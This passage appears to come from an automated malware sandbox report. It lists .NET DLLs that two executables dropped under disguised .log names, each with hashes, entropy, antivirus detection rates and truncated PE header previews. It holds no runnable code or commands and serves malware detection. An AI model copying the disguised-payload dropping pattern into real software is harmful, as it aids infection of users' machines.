                                                  C:\Users\user\Desktop\PAkihvfV.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\PFIKyDTH.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\PYmimUsi.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\PthzQDco.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\QYBPfZgq.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\RONsALFU.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\RyZipATO.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\SIxHSvEB.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\SeerDZBz.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\SmOJiIbE.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\TraZorfO.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\TvAqLAiJ.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\UCgheeoa.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\UTCgmFWk.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\UTTISNjC.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\UYcyJOZf.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\VcGpvFqH.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\VggGSNtC.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\VijSQbQY.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\VuurXSIi.log

                                                  Download File
